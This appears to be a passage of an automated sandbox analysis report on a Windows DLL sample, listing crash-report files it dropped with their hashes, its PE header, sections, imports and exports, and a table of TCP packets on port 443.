                                                                                      Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1206288" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER1FB8.tmp.dmp
                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                      File Type:Mini DuMP crash report, 15 streams, Tue Oct 12 07:38:00 2021, 0x1205a4 type
                                                                                      Category:dropped
                                                                                      Size (bytes):35846
                                                                                      Entropy (8bit):2.385602420989254
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:6SttPXO4uuXjMvQ1IDZKltt/hBSuIS4FTQnnqMUnIIT+Gzn1:6aPXtQvQaKljCFTQnGXB1
                                                                                      MD5:37229BFFD03AE6C3D865065FB3BE8ADD
                                                                                      SHA1:4BC3A558CC16977F2A40CF5E39EBBE1CD0806B65
                                                                                      SHA-256:40C79A034538717B0ED6FD23396F07EE56F600240138BFAC04E4DE16A4949059
                                                                                      SHA-512:FB0D5F5BDA9A425BE058830F6E4E4F23FF17AEBCECF09C303C23C78BC9C4532B6BFD323639C69D758F33A3E012649BC50C9F3D1851EECF0809BBA27F395BABFA
                                                                                      Malicious:false
                                                                                      Preview: MDMP....... .......X;ea...................U...........B..............GenuineIntelW...........T............:ea"............................0..1...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER2FB7.tmp.WERInternalMetadata.xml
                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                      File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):8406
                                                                                      Entropy (8bit):3.698981960718667
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:Rrl7r3GLNib46dAM6YA0967Xgmf8NSqCprhx89bhUsfmUrm:RrlsNiU6OM6Yr67gmf8NS6hHfmV
                                                                                      MD5:08261C667C95C097E00AE3CBC02E477F
                                                                                      SHA1:1322F296EACE346296D435C7168066A6F84BCA5E
                                                                                      SHA-256:97880BE30DE65452FE99D66A85FBE9073B3CDE3E383676D4FEB5684F1DF8C2B9
                                                                                      SHA-512:80B11539493CCC4A673073D28F4EF89BCAEC0743AFC13FAF3C7CA72F3D7A733E5FB5EFFA9C6BBD39D6DF76C634B759F9230F900BFE6B421286EB0BA222111DC4
                                                                                      Malicious:false
                                                                                      Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.5.9.6.<./.P.i.d.>.......
                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER39AB.tmp.xml
                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):4771
                                                                                      Entropy (8bit):4.482600507508291
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:cvIwSD8zsXJgtWI9TzWSC8B6Zs8fm8M4JCdsPMFfF+q8vjsPQ4SrS9d:uITf5UCSNAZRJdSFKmQDW9d
                                                                                      MD5:A90A74AFC22D249341C2902508382C0D
                                                                                      SHA1:F599F8A92AAB279535FF15D8B694D02EE4CF7684
                                                                                      SHA-256:798A106451D1029F1AD81469F050639B2E0BDBEADA592BCD561960727917B587
                                                                                      SHA-512:F3E2AF76C236909A0ECF19663C4B424A6A40DA9AD00FB44E99F4DE1B8C5859743A473B50422AD1675BDF4391C9B751E7DB9A3A0134E7C72C8373589E390420CC
                                                                                      Malicious:false
                                                                                      Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1206288" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER42B2.tmp.dmp
                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                      File Type:Mini DuMP crash report, 15 streams, Tue Oct 12 07:38:10 2021, 0x1205a4 type
                                                                                      Category:dropped
                                                                                      Size (bytes):34582
                                                                                      Entropy (8bit):2.425575299184456
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:6t6NoAQPHlosUXjMvQ1IDZKttNvxiHK1tQPRRKeOXejvVMF:Y6NoAQ4QvQaKtl2kSPRkQve
                                                                                      MD5:70FB9A6E438E3B0B1A26356C9CEC31E6
                                                                                      SHA1:48AE79ADF9C6F37FCC652663C87CF254CC3E152A
                                                                                      SHA-256:9ECD153AED1B04D03D7752F02878B038342E08C6E54C4DEFEECDEFFC542D8850
                                                                                      SHA-512:CC2F86DF386CDAD82F86175DE5F21978869BED6F440F8F4FD1CBAF915EFB8C774DC018C0B8417C47F58DA648DAB129B7E65216CDA1F1FB544448E8598C607914
                                                                                      Malicious:false
                                                                                      Preview: MDMP....... .......b;ea...................U...........B..............GenuineIntelW...........T............:ea!............................0..1...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER5253.tmp.WERInternalMetadata.xml
                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                      File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):8406
                                                                                      Entropy (8bit):3.6986354329795113
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:Rrl7r3GLNiur6396YA867Xgmf8NSqCpr589bdgsf9/m:RrlsNiC6N6YL67gmf8NSEdzfo
                                                                                      MD5:41252F8B1133C148B7EA2C82407A8620
                                                                                      SHA1:ED34F8F81B2923EDD29E322B987C044B878F5764
                                                                                      SHA-256:E2862E4DA28D1E0D61E20AF6E760AEE93787BE950879C3BF9EE9BDF2DA997DB2
                                                                                      SHA-512:152478B4F8116B991DACE8C7C55195EF738DD61171EF88BC411DD6E6E0E9E041005C65E8589D9966EB381C2FAD992DC472F3278150749F11E52E0C6A9620A893
                                                                                      Malicious:false
                                                                                      Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.3.4.8.<./.P.i.d.>.......
                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER55DE.tmp.xml
                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):4771
                                                                                      Entropy (8bit):4.484228784189716
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:cvIwSD8zsXJgtWI9TzWSC8B4Q8fm8M4JCdsPMFwi+q8vjsPaq4SrSqd:uITf5UCSNytJdFiKmaqDWqd
                                                                                      MD5:A6C78841FF7E390BE1BE332B06DFFA0A
                                                                                      SHA1:36D18A2AC336480437565DF1C32EF77DB3E18D73
                                                                                      SHA-256:2C5D9822FC129B455EED5C821BB41ED04D1A9EE07982E3339B95A7EFEE9856E3
                                                                                      SHA-512:166FE8CB0CD60F27024A0BC673DF105E7090B327C4AAE2AB1FEEB63BA86600556B3FB6FE365E0353D3F64C7CB5037457DEF569232D0E87DE9AB7DD58374A52A5
                                                                                      Malicious:false
                                                                                      Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1206288" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER933.tmp.dmp
                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                      File Type:Mini DuMP crash report, 15 streams, Tue Oct 12 07:37:54 2021, 0x1205a4 type
                                                                                      Category:dropped
                                                                                      Size (bytes):35606
                                                                                      Entropy (8bit):2.3965294893524645
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:AXuGzvX8OFMfPXjMvQ1IDZKjtvi2VGPZOR77nEnWK:GLzP8OFMHQvQaKjE2cPZORk9
                                                                                      MD5:FCABB6B003C518E48C5567C56F819B9A
                                                                                      SHA1:0DBEA94D03C091DBC56815F95140181C8300A2C8
                                                                                      SHA-256:8EECD01F90255527983209AAD276036206816555DEFE665D7202005D227FC907
                                                                                      SHA-512:63C365F992B87DF708E10FBBD36BC2E97570D42BB160AAD90B65791777AF8FB7ABE6897357F83F0CD431DEAB6DC987B024BA88DA0231C232F877795DED86699F
                                                                                      Malicious:false
                                                                                      Preview: MDMP....... .......R;ea...................U...........B..............GenuineIntelW...........T.......<....:ea"............................0..1...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................

                                                                                      Static File Info

                                                                                      General

                                                                                      File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Entropy (8bit):6.669953219927633
                                                                                      TrID:
                                                                                      • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                                                                                      • Generic Win/DOS Executable (2004/3) 0.20%
                                                                                      • DOS Executable Generic (2002/1) 0.20%
                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                      File name:m87xfb63XU.dll
                                                                                      File size:718336
                                                                                      MD5:5aa733e108f0fa41df88cea0a309affe
                                                                                      SHA1:ce79918ca7845f2163360ea40a251912998ea226
                                                                                      SHA256:1be687a0453f23ea53b94a4447c926a9b4b6e01c2788e641b76eb4a5215bd960
                                                                                      SHA512:e18ef98a6bb007ee0ef473cd05bad85ac2f177d316981658e17a12f182effbcc98754fbefc362a4212a8eebcc71fc2e2a15c865b08c50f5990223bcb55d001af
                                                                                      SSDEEP:12288:VUAQSxn6fDEr8Np6b/rPPsjosrS9aEoe+0JCym+4YJAOSVUNcuHIGF4uW/XrGAsR:Vz3xn6fq8Np6bTPPaBreaZlYCOSVol2u
                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............}.W.}.W.}.Wy..W.}.W..}W.}.W...V.}.W...V.}.W...V.}.Wy..W.}.W.}.WH|.W...VK}.W...V.}.W...V.}.W.}qW.}.W...V.}.WRich.}.W.......

                                                                                      File Icon

                                                                                      Icon Hash:74f0e4ecccdce0e4

                                                                                      Static PE Info

                                                                                      General

                                                                                      Entrypoint:0x1003ab77
                                                                                      Entrypoint Section:.text
                                                                                      Digitally signed:false
                                                                                      Imagebase:0x10000000
                                                                                      Subsystem:windows gui
                                                                                      Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
                                                                                      Time Stamp:0x5F6FCA4E [Sat Sep 26 23:10:06 2020 UTC]
                                                                                      TLS Callbacks:
                                                                                      CLR (.Net) Version:
                                                                                      OS Version Major:6
                                                                                      OS Version Minor:0
                                                                                      File Version Major:6
                                                                                      File Version Minor:0
                                                                                      Subsystem Version Major:6
                                                                                      Subsystem Version Minor:0
                                                                                      Import Hash:b5c6badd398e2e3aa283a40a40432c6c

                                                                                      Entrypoint Preview

                                                                                      Instruction
                                                                                      push ebp
                                                                                      mov ebp, esp
                                                                                      cmp dword ptr [ebp+0Ch], 01h
                                                                                      jne 00007F0D10C83E77h
                                                                                      call 00007F0D10C84962h
                                                                                      push dword ptr [ebp+10h]
                                                                                      push dword ptr [ebp+0Ch]
                                                                                      push dword ptr [ebp+08h]
                                                                                      call 00007F0D10C83D1Ah
                                                                                      add esp, 0Ch
                                                                                      pop ebp
                                                                                      retn 000Ch
                                                                                      mov ecx, dword ptr [ebp-0Ch]
                                                                                      mov dword ptr fs:[00000000h], ecx
                                                                                      pop ecx
                                                                                      pop edi
                                                                                      pop edi
                                                                                      pop esi
                                                                                      pop ebx
                                                                                      mov esp, ebp
                                                                                      pop ebp
                                                                                      push ecx
                                                                                      ret
                                                                                      mov ecx, dword ptr [ebp-10h]
                                                                                      xor ecx, ebp
                                                                                      call 00007F0D10C83A73h
                                                                                      jmp 00007F0D10C83E50h
                                                                                      mov ecx, dword ptr [ebp-14h]
                                                                                      xor ecx, ebp
                                                                                      call 00007F0D10C83A62h
                                                                                      jmp 00007F0D10C83E3Fh
                                                                                      push eax
                                                                                      push dword ptr fs:[00000000h]
                                                                                      lea eax, dword ptr [esp+0Ch]
                                                                                      sub esp, dword ptr [esp+0Ch]
                                                                                      push ebx
                                                                                      push esi
                                                                                      push edi
                                                                                      mov dword ptr [eax], ebp
                                                                                      mov ebp, eax
                                                                                      mov eax, dword ptr [100AA0D4h]
                                                                                      xor eax, ebp
                                                                                      push eax
                                                                                      push dword ptr [ebp-04h]
                                                                                      mov dword ptr [ebp-04h], FFFFFFFFh
                                                                                      lea eax, dword ptr [ebp-0Ch]
                                                                                      mov dword ptr fs:[00000000h], eax
                                                                                      ret
                                                                                      push eax
                                                                                      push dword ptr fs:[00000000h]
                                                                                      lea eax, dword ptr [esp+0Ch]
                                                                                      sub esp, dword ptr [esp+0Ch]
                                                                                      push ebx
                                                                                      push esi
                                                                                      push edi
                                                                                      mov dword ptr [eax], ebp
                                                                                      mov ebp, eax
                                                                                      mov eax, dword ptr [100AA0D4h]
                                                                                      xor eax, ebp
                                                                                      push eax
                                                                                      mov dword ptr [ebp-10h], eax
                                                                                      push dword ptr [ebp-04h]
                                                                                      mov dword ptr [ebp-04h], FFFFFFFFh
                                                                                      lea eax, dword ptr [ebp-0Ch]
                                                                                      mov dword ptr fs:[00000000h], eax
                                                                                      ret
                                                                                      push eax
                                                                                      inc dword ptr fs:[eax]

                                                                                      Data Directories

                                                                                       Name                                  Virtual Address  Virtual Size  Is in Section
                                                                                       IMAGE_DIRECTORY_ENTRY_EXPORT          0xa8990          0x80          .rdata
                                                                                       IMAGE_DIRECTORY_ENTRY_IMPORT          0xa8a10          0x50          .rdata
                                                                                       IMAGE_DIRECTORY_ENTRY_RESOURCE        0x0              0x0
                                                                                       IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
                                                                                       IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
                                                                                       IMAGE_DIRECTORY_ENTRY_BASERELOC       0x146000         0x53d0        .reloc
                                                                                       IMAGE_DIRECTORY_ENTRY_DEBUG           0xa474c          0x54          .rdata
                                                                                       IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                                                                                       IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                                                                                       IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
                                                                                       IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0xa47a0          0x40          .rdata
                                                                                       IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                                                                                       IMAGE_DIRECTORY_ENTRY_IAT             0x7b000          0x1fc         .rdata
                                                                                       IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
                                                                                       IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
                                                                                       IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x79f71 | 0x7a000 | False | 0.510071801358 | data | 6.7546243609 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata | 0x7b000 | 0x2e586 | 0x2e600 | False | 0.556366871631 | data | 5.60179729877 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xaa000 | 0x9b19c | 0x1800 | False | 0.190266927083 | data | 4.15778005426 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.reloc | 0x146000 | 0x53d0 | 0x5400 | False | 0.752650669643 | data | 6.72453697464 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL | Import
KERNEL32.dll | LockResource, FreeLibrary, GetProcAddress, VirtualProtect, OpenProcess, GetCurrentThreadId, Sleep, GetSystemTime, CreateSemaphoreW, LoadLibraryW, GetModuleFileNameW, GetModuleHandleW, GetTempPathW, CreateFileW, GetVolumeInformationW, QueryPerformanceCounter, GetVersionExW, GetDateFormatW, OutputDebugStringW, CloseHandle, ReadConsoleW, ReadFile, GetConsoleMode, GetConsoleCP, WriteFile, FlushFileBuffers, HeapSize, SetStdHandle, SetFilePointerEx, GetFileSizeEx, GetProcessHeap, SetEnvironmentVariableW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetCommandLineA, GetOEMCP, GetACP, IsValidCodePage, FindNextFileW, FindFirstFileExW, FindClose, SetConsoleCtrlHandler, GetFileType, GetStdHandle, HeapReAlloc, HeapFree, EnumSystemLocalesW, GetUserDefaultLCID, IsValidLocale, EncodePointer, DecodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, WideCharToMultiByte, SetLastError, InitializeCriticalSectionAndSpinCount, CreateEventW, SwitchToThread, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetSystemTimeAsFileTime, GetTickCount, MultiByteToWideChar, GetStringTypeW, CompareStringW, LCMapStringW, GetLocaleInfoW, GetCPInfo, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, GetCurrentProcess, TerminateProcess, GetCurrentProcessId, InitializeSListHead, RaiseException, RtlUnwind, InterlockedPushEntrySList, InterlockedFlushSList, GetLastError, LoadLibraryExW, QueryPerformanceFrequency, ExitProcess, GetModuleHandleExW, GetCurrentThread, HeapAlloc, GetTimeZoneInformation, GetTimeFormatW, WriteConsoleW
USER32.dll | CreateMenu, DeferWindowPos, BeginDeferWindowPos, UnregisterHotKey, TranslateMessage, RegisterWindowMessageW, GetPropW
MSACM32.dll | acmDriverClose, acmFormatChooseW, acmFilterDetailsW, acmFilterEnumW, acmDriverEnum, acmDriverPriority, acmFormatEnumW, acmFilterTagEnumW, acmFormatTagDetailsW, acmDriverMessage, acmFormatSuggest, acmFilterTagDetailsW, acmFormatTagEnumW, acmFilterChooseW, acmDriverOpen, acmDriverDetailsW, acmFormatDetailsW, acmMetrics, acmDriverAddW, acmDriverRemove, acmDriverID, acmGetVersion

Exports

Name | Ordinal | Address
BeGrass | 1 | 0x10016020
Fieldeight | 2 | 0x100162f0
Often | 3 | 0x10016510
Townenter | 4 | 0x100167a0

Network Behavior

Network Port Distribution

TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 12, 2021 00:37:08.138408899 CEST | 49754 | 443 | 192.168.2.3 | 13.82.28.61
Oct 12, 2021 00:37:08.138458967 CEST | 443 | 49754 | 13.82.28.61 | 192.168.2.3
Oct 12, 2021 00:37:08.138557911 CEST | 49754 | 443 | 192.168.2.3 | 13.82.28.61
Oct 12, 2021 00:37:08.144805908 CEST | 49754 | 443 | 192.168.2.3 | 13.82.28.61
Oct 12, 2021 00:37:08.144840002 CEST | 443 | 49754 | 13.82.28.61 | 192.168.2.3
Oct 12, 2021 00:37:08.468203068 CEST | 443 | 49754 | 13.82.28.61 | 192.168.2.3
Oct 12, 2021 00:37:08.468302965 CEST | 49754 | 443 | 192.168.2.3 | 13.82.28.61
Oct 12, 2021 00:37:08.471484900 CEST | 49754 | 443 | 192.168.2.3 | 13.82.28.61
Oct 12, 2021 00:37:08.471517086 CEST | 443 | 49754 | 13.82.28.61 | 192.168.2.3
Oct 12, 2021 00:37:08.471929073 CEST | 443 | 49754 | 13.82.28.61 | 192.168.2.3
Oct 12, 2021 00:37:08.525940895 CEST | 49754 | 443 | 192.168.2.3 | 13.82.28.61
Oct 12, 2021 00:37:08.848328114 CEST | 49754 | 443 | 192.168.2.3 | 13.82.28.61
Oct 12, 2021 00:37:08.891207933 CEST | 443 | 49754 | 13.82.28.61 | 192.168.2.3
Oct 12, 2021 00:37:08.972404003 CEST | 443 | 49754 | 13.82.28.61 | 192.168.2.3
Oct 12, 2021 00:37:08.972512960 CEST | 443 | 49754 | 13.82.28.61 | 192.168.2.3
Oct 12, 2021 00:37:08.972582102 CEST | 49754 | 443 | 192.168.2.3 | 13.82.28.61
Oct 12, 2021 00:37:08.974659920 CEST | 49754 | 443 | 192.168.2.3 | 13.82.28.61
Oct 12, 2021 00:37:08.974698067 CEST | 443 | 49754 | 13.82.28.61 | 192.168.2.3
Oct 12, 2021 00:37:08.974714041 CEST | 49754 | 443 | 192.168.2.3 | 13.82.28.61
Oct 12, 2021 00:37:08.974726915 CEST | 443 | 49754 | 13.82.28.61 | 192.168.2.3
Oct 12, 2021 00:37:10.324203014 CEST | 49756 | 443 | 192.168.2.3 | 13.82.28.61
Oct 12, 2021 00:37:10.324264050 CEST | 443 | 49756 | 13.82.28.61 | 192.168.2.3
Oct 12, 2021 00:37:10.324605942 CEST | 49756 | 443 | 192.168.2.3 | 13.82.28.61
Oct 12, 2021 00:37:10.332449913 CEST | 49756 | 443 | 192.168.2.3 | 13.82.28.61
Oct 12, 2021 00:37:10.332494020 CEST | 443 | 49756 | 13.82.28.61 | 192.168.2.3
Oct 12, 2021 00:37:10.532701969 CEST | 443 | 49756 | 13.82.28.61 | 192.168.2.3
Oct 12, 2021 00:37:10.532824993 CEST | 49756 | 443 | 192.168.2.3 | 13.82.28.61
Oct 12, 2021 00:37:10.534596920 CEST | 49756 | 443 | 192.168.2.3 | 13.82.28.61
Oct 12, 2021 00:37:10.534621954 CEST | 443 | 49756 | 13.82.28.61 | 192.168.2.3
Oct 12, 2021 00:37:10.534996986 CEST | 443 | 49756 | 13.82.28.61 | 192.168.2.3
Oct 12, 2021 00:37:10.620332003 CEST | 49756 | 443 | 192.168.2.3 | 13.82.28.61
Oct 12, 2021 00:37:10.849668026 CEST | 49756 | 443 | 192.168.2.3 | 13.82.28.61
Oct 12, 2021 00:37:10.891135931 CEST | 443 | 49756 | 13.82.28.61 | 192.168.2.3
Oct 12, 2021 00:37:10.967940092 CEST | 443 | 49756 | 13.82.28.61 | 192.168.2.3
Oct 12, 2021 00:37:10.968015909 CEST | 443 | 49756 | 13.82.28.61 | 192.168.2.3
Oct 12, 2021 00:37:10.968296051 CEST | 49756 | 443 | 192.168.2.3 | 13.82.28.61
Oct 12, 2021 00:37:10.968647003 CEST | 49756 | 443 | 192.168.2.3 | 13.82.28.61
Oct 12, 2021 00:37:10.968667984 CEST | 443 | 49756 | 13.82.28.61 | 192.168.2.3
Oct 12, 2021 00:37:49.746129990 CEST | 49784 | 443 | 192.168.2.3 | 40.97.153.146
Oct 12, 2021 00:37:49.746206999 CEST | 443 | 49784 | 40.97.153.146 | 192.168.2.3
Oct 12, 2021 00:37:49.746301889 CEST | 49784 | 443 | 192.168.2.3 | 40.97.153.146
Oct 12, 2021 00:37:49.747075081 CEST | 49784 | 443 | 192.168.2.3 | 40.97.153.146
Oct 12, 2021 00:37:49.747144938 CEST | 443 | 49784 | 40.97.153.146 | 192.168.2.3
Oct 12, 2021 00:37:50.068757057 CEST | 443 | 49784 | 40.97.153.146 | 192.168.2.3
Oct 12, 2021 00:37:50.068881989 CEST | 49784 | 443 | 192.168.2.3 | 40.97.153.146
Oct 12, 2021 00:37:50.071365118 CEST | 49784 | 443 | 192.168.2.3 | 40.97.153.146
